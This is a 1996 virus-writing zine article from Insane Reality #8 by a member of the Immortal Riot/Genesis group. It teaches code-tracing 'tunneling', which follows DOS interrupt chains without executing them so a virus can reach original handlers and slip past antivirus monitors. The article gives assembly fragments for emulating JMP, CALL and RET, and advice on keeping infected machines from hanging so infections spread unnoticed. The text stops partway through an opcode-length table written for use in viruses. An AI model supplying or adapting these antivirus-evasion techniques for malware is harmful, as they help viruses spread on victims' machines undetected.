Insane Reality issue #8 - (c)opyright 1996 Immortal Riot/Genesis - REALITY.011 Article: Code Tracing Author: Methyl [IRG] % Tunneling with Code Tracing by Methyl [IRG] % _______________________________________________ Here's a great tutorial on Tunneling via Emulation by Methyl, one of IRG's newest members. It should be noted that this article deals with the some what complex issue of Code Emulation, not just lame INT 01h single-stepping. For an example of an even more complex Code Emulator, you might want to see Tracer which is also inculuded in IR zine #8. Example .ASM file, then Debug Script, follow. - _Sepultura_ ============================================================================= ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Tunneling ³ ³ with ³ ³ Code Tracing ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Introduction ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Welcome to the wonderfull world of tunneling with code tracing. If you have absolutely no idea what single step tunneling is (ie: you have not yet reached the level of tunneling marsupial) then go back and read document one in this series (which you can steal from http://www.ikx.org/xine). Heck, why live as an amoeba, wiggling about in chemical soup devouring micro-organisms, when you can be a fully grown marsupial, stealing crocodile eggs. Anyway, as you'll remember, where we last left off, you had learnt about the pitfalls of single step mode. To quickly recap, it can be detected by AV software, single step mode isn't compatible with some software out there such as DESQView, and just generally, single stepping stinks :) So, this is where code tracing comes in. Code tracing is important to learn, because it'll open your eyes to all the posibilities of tunneling, proving that there -IS- life after single step mode, and coding a code tracer will help you in lots of other forms of tunneling too. On top of this, it looks really cool, and well, "code tracing" sounds cool ;) Best of all, it can't activate AV software anti-tunneling mechanisms, which is going to be its main selling point throughout this document. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 1: Code tracing, the basics ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Code tracing was publicly 'invented' in September 1993, when a virus writer called Khontark released his "Recursive Tunneling Toolkit". His code was *VERY* compact, and hey, back then it worked. However, people in the VX community generally rejected it, because of how easy it was TO fool it... and yet, even today, it does a pretty good job of getting past AV software, simply because even though it CAN be fooled, no-one has been bothered putting actual code in to fool it (hehehe, it can't tunneling through DESQView though). Code tracing is pretty much a dead art, at least, it hasn't been revived much since Khontark gave it a try. However, the problems of 1993's code tracers can be easily fixed with enough coding ingenuity. Stability can be increased past the expectations of even people who hate code tracers, with no noticeable speed decrease (noticeable meaning less than 1/2 a second increase in tracing time). The only problem is code space, but an extra 1k or so on your virus won't do any harm, and things can *ALWAYS* be optimized... So, it's time to tell you how code tracers actually work. To put it simply, they try to follow the flow of execution in an interrupt chain, without executing any of that code. They do this by looking at the opcodes that WOULD execute if the interrupt was run... and checking if they are JMP/CALL instructions, etc, and if they are, they are followed and tracing continues. This continues until the tracer hits the original interrupt entrypoint, using the same methods as single step tunnelers. That may sound a little hard to understand, but re-read it a few times and it'll come to you. It's simple. For example, say we point DS:SI to the entrypoint of an interrupt. Then, we take the word of memory at that location and compare it against the opcodes of the JMP and CALL instruction series. If there's a match, DS:SI is updated, and we continue tracing, if not, we look at the next memory location and loop around again checking the word of memory. Of course, there are problems with using this *EXACT* method of tracing, but you'll learn more about them when we take a more in-depth look later on. ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Overrides ³ ÃÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ CS: 02eh 1 byte ³ ³ DS: 03eh 1 byte ³ ³ ES: 026h 1 byte ³ ³ SS: 036h 1 byte ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The first type of 'opcode' we should check against, are the segment overrides. You'll remember these happy little fellows from document one and the OPCODE CHECK method of tunneling, and you'll remember that we need to recognize them to correctly handle a following JMP or CALL that references memory (for instance JMP FAR PTR CS:[ORIGINAL_13]). Since we are not executing instructions... the only value of a segment register we know for sure is CS:, and as such, if we encounter an instruction such as the one above, but with another segment override, we have to abort, as we don't know where to get the address to flow to from. ÚÄÄÄÄÄ¿ ³ JMP ³ ÃÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ JMP SHORT 0ebh 2 bytes mov al, [si+1] ³ ³ cbw ³ ³ add si, ax ³ ³ add si, 2 ³ ³ JMP NEAR (immed) 0e9h 3 bytes add si, [si+1] ³ ³ add si, 3 ³ ³ JMP NEAR (mem) 0ffh, 026h 4 bytes mov si, [si+2] ³ ³ mov si, [si] ³ ³ JMP FAR (immed) 0eah 5 bytes mov ax, [si+3] ³ ³ mov si, [si+1] ³ ³ mov ds, ax ³ ³ JMP FAR (mem) 0ffh, 02eh 4 bytes mov si, [si+2] ³ ³ mov ax, [si+2] ³ ³ mov si, [si] ³ ³ mov ds, ax ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ JMP instructions are pretty easy to handle (from here on the instruction tables include code so you can see what is happening if DS:SI is our pointer and it was pointing to the JMP). Most of the jump instructions work by giving you an offset, and you simply add that to your SI plus the length of the instruction. However, in both JMP FAR and JMP NEAR with memory access, you simply get a new [DS:]SI. Notice that this is only EXAMPLE code, we will actually handle JMP SHORT's differently in our end tracer for reasons you'll discover later. ÚÄÄÄÄÄÄ¿ ³ CALL ³ ÃÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ CALL NEAR (immed) 0e8h 3 bytes mov ax, si ³ ³ add ax, 3 ³ ³ push ax ³ ³ add si, [si+1] ³ ³ add si, 3 ³ ³ CALL NEAR (mem) 0ffh, 016h 4 bytes mov ax, si ³ ³ add ax, 4 ³ ³ push ax ³ ³ mov si, [si+2] ³ ³ mov si, [si] ³ ³ CALL FAR (immed) 09ah 5 bytes mov ax, si ³ ³ add ax, 5 ³ ³ push ds ³ ³ push ax ³ ³ mov ax, [si+3] ³ ³ mov si, [si+1] ³ ³ mov ds, ax ³ ³ CALL FAR (mem) 0ffh, 01eh 4 bytes mov ax, si ³ ³ add ax, 5 ³ ³ push ds ³ ³ push ax ³ ³ mov si, [si+2] ³ ³ mov ax, [si+2] ³ ³ mov si, [si] ³ ³ mov ds, ax ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ CALL instructions are handled just like their corresponding JMP instructions, however, we save the value of the next instruction onto the stack, so that when we also emulate RET instructions, we can fully trace the flow of execution. Once again, this is example code for an extremely simple tracer, which we will not be using. ÚÄÄÄÄÄ¿ ³ RET ³ ÃÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ IRET 0cfh 1 byte pop si ³ ³ pop ds ³ ³ RET NEAR 0c3h 1 byte pop si ³ ³ RET FAR 0cbh 1 byte pop si ³ ³ pop ds ³ ³ RET NEAR (immed) 0c2h 3 byte pop si ³ ³ RET FAR (immed) 0cah 3 byte pop si ³ ³ pop ds ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The RET family is pretty easy to handle, the only real things you need to look out for is the RETs with pop values and IRET. Since a copy of the flags will never be pushed onto the stack (because we don't emulate PUSHF/POPF, there is no need as we never know the status of the flags register), we don't try to pop this value off. Usually the RET instructions with pop values simply use the pop values field to get rid of passed paramaters to a routine, or skip popping the flags off of the stack if an interrupt was executed/emulated. Since no registers other than DS:SI are ever on the stack, we just treat the pop values as 0, otherwise we get into complications. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 2: Keeping our code tracer healthy ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ One of the major problems with Khontark's code tracer, was its ability to hang the machine. Obviously, a virus which hangs a computer whenever an infected file is executed will not propogate very far, and is likely to arouse great suspicion. However, Khontark can't really be blamed, as he was aiming for fast speed and low space. Anyway, there are lots of things you need to deal with to stop your computer from hanging. ÚÄÄÄÄÄÄÄÄÄÄÄ¿ ³ The quirk ³ ÀÄÄÄÄÄÄÄÄÄÄÄÙ We'll start off with the simple stuff. In INTEL CPU's (and maybe other clones, I'm not sure), there is a really strange undocumented(?) quirk we need to watch out for. If we ever read a WORD value from the last BYTE of a segment, what do you think would happen? At first, you may think we'd get the last byte of the segment as half of the word, and the other half of the word we'd get from the first byte of the segment. However, this does *NOT* happen, what happens is that our computer hangs and memory managers go crazy with exception errors. So much for being stealthy if every program that is infected causes problems for the computer :) So, what can we do? Well, we make sure we don't read a word from the end of a segment! Alternatively, we can simply check our fake IP for a value of about 0FFF8h... and abort if that is the case. This isn't too bad an idea, and it takes up much less code than checking EVERY read from memory for an end-of-segment value. It would be really rare to have an instruction in the last few bytes of a segment, so we shouldn't worry too much about incompatability. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Proper care and feeding of your stack ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ The stack is just like any other animal, if you overfeed it, it dies... starve it, and it dies as well. Most of all, if the stack dies, just like an animal, the rotting corpse of a dead animal is likely to arouse suspicion in your neighbourhood ;) So, now you need to learn about the proper care and feeding of your stack. First, we need to make sure we don't feed it to much. To do this, we need to get to know about the stack you'll be working with. In a .COM file, the stack is in the same segment as your code segment and grows downwards. In an .EXE file, the stack can either be the same as in a .COM file, or, alternatively, it can reside in another segment and grow down from the starting SP to 0. So, we simply save the lowest possible value which we can allow the stack to grow down to (the most we can feed it without killing it), and on each PUSH we do in our code, we make sure we don't go past that value. However, say a friendly neighbour next door is feeding our stack (animal) every now and again some scraps, we may overfeed it and the stack dies. So, be sure to keep a little extra space free for unexpected feedings (hardware interrupts, etc, etc) during your trace. A small amount of 20 words (snacks) or so will suffice greatly. Now, we have to make sure we don't starve our stack to death :) This means, we save our SP on entry to the tracer, and if we ever POP values past that point, we know something went wrong, and we abort the tracing. That isn't too hard is it? On top of this, if we find an error during our tracing, we can restore our SP value on exit, so as to not screw our stack up with all the values we used in our tracing code (think of it as bringing our animal back to life with magic after someone overfeeds it). ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Termination ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Now, we need to know how we can terminate our tracer. Of course, we can use segment checks, etc, like you learnt about in document one... however, what if something goes wrong and we never end up reaching the original entrypoint, what would we do then? Luckily, due to the way we are keeping our stack nice and healthy, it can be good to us, like a healthy dog catching a stick you throw for it. When we start up our tracer, we push two fake values onto the stack, as if we were calling the interrupt itself (the values themselves don't matter, and we do not need a 3rd value for the flags, these are never used on our normal IRET/RETF code anyway). Then, if our code ever pops these two values off of the stack, we know we've properly exited the interrupt, and although we might not have found our entrypoint (we MIGHT have found it if we were using the OPCODE CHECK method of finding it, etc), we have exited the tracing code with no errors, a good sign. At least we didn't hang! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 3: Dealing with the 'other' opcodes ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ You'll notice that I didn't mention what we do if our current opcode ISN'T one of the 'important' ones I listed above. Well, the reason is because there are two ways you can go about handling these opcodes, and the discussion is large enough and comprehensive enough to deserve its own section. The usual method of handling unknown opcodes is to simply increment the SI and look at the next value, and keep going until we find the opcode we're looking for. However, this is exactly where Khontarks tunneler went wrong, because with such a strategy, this is what happens. Remembering that JMP FAR with a memory reference has an opcode is 0eah (from the tables I gave you in section 1)... and by taking my word that MOV BX, word-immediate is 0bbh, we can create a hypothetical instruction such as that below. Instruction Opcode ÀÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÙ MOV BX, 000EAH 0bbh, 0eah, 00 So, basically, say this is the start of the interrupt handler, and the first thing for the tracer to see is '0bbh'. It doesn't understand this opcode, so it goes onto the next opcode, '0eah', which it sees as a FAR JMP with a memory reference. This is *NOT* good because then our tracer gets the next 2 words as its new offset:segment value, and blam, we've been screwed into tracing into unknown memory. From here, all sorts of things can go wrong, and quite possibly the computer will hang without the proper precautions that I presented in section 2. It was for reasons such as this that Khontarks tunneler was disliked. However, the reason he didn't fix this up is because of sheer code size. Think for example, of somehow storing all the INTEL opcodes in a big table with each ones corresponding size. To be blunt, all the instructions INTEL made up have either a one byte or one word opcode, and then various lengths of data bytes following, depending on the actual value of the opcodes. Okay, well, lets just say we set up a table of every word opcode INTEL could use, with a length byte following. Lets do some maths! Possible number of opcodes: 10000h Number of bytes per table entry: 3 bytes ÀÄÄÄÄÄÄÙ 30000h bytes Yes, just for their word opcodes, we need roughly 200 decimal kilobytes to hold this table. Of course INTEL hasn't used *EVERY* possible combination of opcode! However, there's no way of knowing which opcodes it has/hasn't used, and even if we did, heck, that's still going to be a motherfucker of a table to type out and test. So, what alternatives do we have? Well, I'm not sure this is *THE* best way, but, I worked out something called the 'Complex Mask Tables', (c)1996 Methyl aka The Pirate Prince :) How can a complex mask table help us? Well, whereas our previous table would have been 200k at MOST, and a HELL of alot of typing, our complex mask table compresses this down to less than 300 bytes and includes a lot less typing (especially since I'll give you a fully complete example table) :) Before we go into diagrams and examples of a complex mask table, first you must understand the idea behind it. INTEL wasn't so dumb as to randomly select numbers for every type of instruction out there, it followed general rules in describing most of its instruction set. Usually, one byte opcodes which complement each other, such as STI and CLI have only 1 bit that differs between the two. Also, in word instructions, they set things out in a complex format, which we'll quickly glaze over here. In a word opcode (usually), we have our first byte, and our second byte. The first byte usually determines the instruction itself, size of register to be used or data length to access if a memory operand is given. Meanwhile, the second byte has information on if we are accessing registers or memory, how we are accessing this data, etc, etc, etc. Between common word instructions, the format of the second field stays constant with slight variations in the bitfields of the first byte. Also, we can work out the length of an instruction via the information we can gain from the second byte. So, if we can 'group' instructions together by leaving out the bits which change between them, we can then setup an algorithm to work out our instruction length from the second byte, and our table is suddenly smaller. If this isn't clear yet, read on, because it's easier to understand when you see it in action. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ Layout of a table entry: Size Description ÀÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÙ byte field descriptor byte byte/word MASK value repeat byte length encoding information var. CMP value var. CMP value or doesn't exist until no CMP values left Field descriptor byte: ³7³6³x³x³3³2³1³0³ ³ ³ ³ ³ ³ ÀÂÁÂÁÄÂÄÁÄÄÂÄÄÄÄÙ ³ ³ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ ÀÄÄÄÄ¿ ^ ³ ³ ^ 0=Opcode prefix is byte ³ ³ Total number of CMP values to process 1=Opcode prefix is word ³ ÀÄÄÄ¿ ³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ^ ^ FIXUP Not used, so available for storing info 0=No fixup neccessary should you expand my table definition 1=FIXUP needed Length encoding information: ³7³6³5³4³3³2³1³0³ ³ 2 ³ 1 ³ ÀÂÄÄÄÄÄÄÁÂÄÄÄÄÄÄÙ ^ ^ Grouped into nibbles, describing the total length of instruction should the CMP value of the field match. Although only 3 bits are ever actually needed for this value, less decoding is needed with a complete word format such as this. ³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³³ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Okay, so you just saw the layout of my complex mask table. Of course, you could make your own format up, but, this should do you and me for a very long time. It's best not to fret anyway, we'll have to completely redesign the thing from scratch in document four (maybe) :) Anyway, as you can see, we set up a table of entries, which is described in the diagrams above. Our entry begins with a field descriptor byte, which will tell our table decoder, which is tracing an opcode value through our table, information it needs to know to decode the fields. First, it tells wether MASK and CMP values are byte or words, and as such, wether we are testing for a byte or word opcode in this entry (as it is beforehand unknown wether what value you have is word or byte, so you load up a word to trace and go through until either a byte or word match is found). Next is the FIXUP bit, which is used to fixup a strange quirk in many of INTEL's instructions that make them incompatible with complex mask tables. Finally, we have 2 spare bits for you to add extra info on with into my table should you chose to do so, and the last four bits tell our decoder how many CMP values we will be processing. Now that we know the layout of the rest of our field, our decoder ANDs the opcode it is testing against the next field, which is a byte or word depending on the information it gets from the field descriptor byte. This will mask off any different bit fields of instructions with similar layouts but just a few stray bits between them. After this, the count of CMP values we have in our field descriptor byte comes into play. The rest of our entry is filled with a repetition of length encoding byte, and one or two CMP values, until there are no more CMP values left. For example, here is the layout of 3 entries, with 1, 3, and 6 CMP fields respectively: length length length cmp cmp cmp cmp cmp length length cmp cmp cmp length cmp cmp You get the idea. Now, when our decoder has finished ANDing the stray bits off of the opcode, it compares the resultant opcode with the current CMP value. If a match occurs, it gets the total instruction length from the data encoded in the length encoding information byte. If the first CMP value matches, the length is in the bits 3-0, if the second CMP value matches, it is the bits 7-4. Each 2 CMPs has its own length encoding information byte. Well, I think it's time for an example. For our example entry, we'll use a fairly complex instruction... INC (increment). Increment comes in two forms, INC [register] and INC [register/memory]. INC [register] is a one byte long opcode and its format is as follows. The bit layout is '001000xxx' where xxx is a value depending on which register we are going to increment. Each register (AX, BX, etc) has its own 3 bit value which we could plug into here should we want to. This means, in a one-byte simple table format (instruction value:length), we'd be set out like this: db 001000000xb, 1 db 001000001xb, 1 db 001000010xb, 1 db 001000011xb, 1 db 001000100xb, 1 db 001000101xb, 1 db 001000110xb, 1 db 001000111xb, 1 That's 16 bytes wasted on ONE relatively simple implementation of ONE instruction. However, we're not here to complain about how my format is better, we're here to teach you how to set up an entry, so here we go. First, we need to begin setting up our field descriptor byte. So far, we know we're a byte opcode, with no FIXUP, and the number of CMPs we need is (so far, to you) unknown. Then, we need our mask value which will be a byte long. Since we need to cover ALL types of this instruction, we mask off the unimportant bits. How do we do this? 001000???xb AND 011111000xb ÀÄÄÄÄÄÄÄÄÄÙ 001000000xb Blam, we've elimated all the unimportant bits, and are left with only one value no matter which register we use with INC. This means we have one CMP value, which we now know as 001000000xb and we set our number of CMPs in the field descriptor byte to 1. Now, we know the length of our instruction will always be one byte, so our length encoding information is set to '000000001xb' (the first 4 bits don't matter at all, since they won't be used since we're using only one CMP value). We are left with our table entry as this: db 000000001xb ³³ ÀÄÄÄÄÄÄ> 1 CMP value ³ÀÄÄÄÄÄÄÄÄÄÄÄÄ> No fixup needed ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ> Byte opcode db 011111000xb ÄÄÄ> ANDs out register bits db 000000001xb ÄÄÄ> if - 1st CMP match : total length is 1 byte - 2nd CMP match : NULL (no 2nd CMP) db 001000000xb ÄÄÄ> Our CMP value And thats our entry FINISHED! However, we have a second example, the INC [register/memory] variant. This is, quite a bit more complex than our previous example but you're so smart I'm sure you'll get it in a snap. This variant of INC is 2 bytes long, and is setout as follows: 01111111Wxb, 0XX000ZZZxb The first 7 bits are always constant, and the last bit is 0 if the register or memory location to be incremented is a byte, or 1 if it is a word. XX and ZZZ have special meaning though. XX (for this example) varies the total instruction length as follows: 00 = 2 bytes 01 = 3 bytes 10 = 4 bytes 11 = 2 bytes However! If xx=0 AND zzz=110, then our total instruction length will be 4 bytes long! Why? Well, it's not worth getting into right now, just know that this happens. For all the other XX values, ZZZ doesn't matter at all. This is the reason we have the FIXUP bit. If our instruction is set out like INC, we set the FIXUP bit, and when our decoder decodes our table entry, it will add a check to make sure if XX=00 and ZZZ=110 then the proper modifications to instruction length will be made. Why is it like this? Well, if we DON'T add this, then we can't mask off the ZZZ field, which we *REALLY* need to do, otherwise our table size will bloat to many kilobytes. Back to setting up our table entry :) We have a word long opcode, which needs fixup, with unknown CMP values. We also know we need to mask out the 'w' bit as it won't affect instruction length, and that we need the last 3 bits of 'zz000xxx' to be destroyed (as our decoder will handle the XX=0 ZZZ=110 exception). Also, we know we have 4 variations of XX, and therefore 4 types of CMP to compare, so we can finish of our field descriptor byte, cmp values, and length encoding bytes. Here's our end table entry: db 011000100xb ³³ ÀÄÄÄÄÄÄ> 4 CMP values ³ÀÄÄÄÄÄÄÄÄÄÄÄÄ> FIXUP needed ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ> Word opcode db 011111110xb, 011111000xb ÀÄÄÄÄ> ANDs out 'w' and 'zzz' bits db 000110010xb ÄÄÄ> if - 1st CMP match : total length is 2 bytes - 2nd CMP match : total length is 3 bytes db 011111110xb, 000000000xb ÀÄÄÄÄ> CMP value 1 db 011111110xb, 001000000xb ÀÄÄÄÄ> CMP value 2 db 000100100xb ÄÄÄ> if - 1st CMP match : total length is 4 bytes - 2nd CMP match : total length is 2 bytes db 011111110xb, 000000000xb ÀÄÄÄÄ> CMP value 1 db 011111110xb, 001000000xb ÀÄÄÄÄ> CMP value 2 Phew! Now that's over it's time to look at space savings. In a simple table format, we take up 378 bytes, and in our complex mask table format we take up 13 bytes :) Pretty neet huh? But that's not all!!! We can save EIGHT times as much as this by using this VERY SAME entry size! Keep reading! Think back to the layout of the bitfields in our INC instruction, which are '01111111wxb, 0xx000zzzxb', and take a close look at the 000 in the second byte. Well, INTEL was very smart in combining the types of lots of its instructions into this very same format, except the 000 is 001 and 010 etc. With a bit of quick math, you'll work out there's 8 such instructions, 1 of which is INC. So, if we can mask out these bits, we'll have the same 13 byte entry instead of a corresponding 3024 byte entry in simple table entry format which will handle 8 different instructions!!! How do we do this? Look at the new table entry below: db 011000100xb db 011111110xb, 011000000xb ÀÄÄÄÄ> ANDs out 'w', '000' and 'zzz' bits db 000110010xb db 011111110xb, 000000000xb db 011111110xb, 001000000xb db 000100100xb db 011111110xb, 000000000xb db 011111110xb, 001000000xb Done! This is how we can save OODLES of space in our table entry, allowing us to setup lengths for every instruction in INTELs set without having to worry too much about a 200k big table :) INTEL has littered 'common' instructions like this all through its instruction set, and so the space savings are up to you and how well you can write MASK values. Of course, complex mask tables aren't the ONLY way of doing things! However, it is all I've been able to think of :) Of course, I may not be the best on combining MASK values, but, I've done pretty well. Also, we've succeeded in creating a viable method for handling stray opcodes other than incrementing the instruction pointer by 1, and spending further time to shave off 30 or so bytes isn't really worth the effort. Maybe you can work something out better than a complex mask table, or make a more compact definition, or even use a totally different concept all together, but until then... Anyway, you've just taken a walk through the concept of complex mask tables, and I hope you enjoyed it :) To save you all the time and frustration of fitting all of INTELs set into my table format, I've already done it all for you! MAYBE I have one or two bits wrong throughout the whole table, but I've tested it out a few times and as far as I can see nothing is wrong with it :) Anyway, we end up with a table size of 253 bytes, a MASSIVE saving on 200k :) Woo! Time to see the fruits of our (my) labour, don't you think? ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Section 4: (8086/8088) COMPLETE Complex Mask Table! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ instruction_table_start: db 000000001xb db 011110000xb db 000000001xb db 010010000xb ; CBW/CWD/POPF/PUSHF/SAHF/WAIT/CWDE/LAHF ; XCHG [reg, accumulator] db 000000001xb db 011110110xb db 000000001xb db 011110100xb ; CLD/STD/CMC/HLT db 000000011xb db 011111100xb db 000100001xb db 011111000xb ; CLC/STC/CLI/STI db 011100000xb ; LOOP[N]E/JCXZ db 000000001xb db 011110000xb ; REP[NE]/LOCK db 000000001xb db 011110100xb db 000100001xb db 010100100xb ; CMPS[B|W]/MOVS[B|W]/LODS[B|W]/SCAS[B|W] db 000000001xb db 011100000xb db 000000001xb db 001000000xb ; [DEC|INC|PUSH|POP] register db 000000001xb db 011000110xb db 000000001xb db 000000110xb ; AAA/AAS/DAA/DAS ; PUSH/POP [segment register] db 000000001xb db 011111000xb db 000000001xb db 010010000xb ; XCHG [register, accumulator] / NOP db 000000001xb db 011111110xb db 000000010xb db 011010100xb ; AAD/AAM [including wierd format] db 000000001xb db 011111110xb db 000000001xb db 001100000xb ; [PUSH|POP]A db 000000001xb db 011111110xb db 000000001xb db 010011100xb ; [POPF|PUSHF] db 000000010xb db 011111100xb db 000100001xb db 011101100xb db 011100100xb ; [IN|OUT] variable port|fixed port db 000000010xb db 011111101xb db 000010010xb db 011001101xb db 011001100xb ; IRET|INT [variable|3|overflow] db 000000001xb db 011111110xb db 000000001xb db 010101010xb ; STOS[B|W] db 000000001xb db 011111111xb db 000000001xb db 011010111xb ; XLAT db 011000100xb db 011111000xb, 011000000xb db 000110010xb db 011011000xb, 000000000xb db 011011000xb, 001000000xb db 000100100xb db 011011000xb, 010000000xb db 011011000xb, 011000000xb ; ESC db 011000100xb db 011111110xb, 011000000xb db 000110010xb db 011000100xb, 000000000xb db 011000100xb, 001000000xb db 000100100xb db 011000100xb, 010000000xb db 011000100xb, 011000000xb ; LDS/LES db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 010001000xb, 000000000xb db 010001000xb, 001000000xb db 000100100xb db 010001000xb, 010000000xb db 010001000xb, 011000000xb ; MOV [reg/mem] with register db 000000001xb db 011111100xb db 000000011xb db 010100000xb ; MOV memory with accumulator db 000000010xb db 011111000xb db 000100011xb db 010111000xb db 010110000xb ; MOV reg, immediate db 000000010xb db 011111111xb db 000110010xb db 010101000xb db 010101001xb ; TEST accumulator, immediate db 011000100xb db 011000100xb, 011000000xb db 000110010xb db 000000000xb, 000000000xb db 000000000xb, 001000000xb db 000100100xb db 000000000xb, 010000000xb db 000000000xb, 011000000xb ; [ADC|ADD|AND|CMP|OR|SBB|SUB|XOR] ; [reg/mem] with register db 011000100xb db 011111100xb, 011000000xb db 000110010xb db 011010000xb, 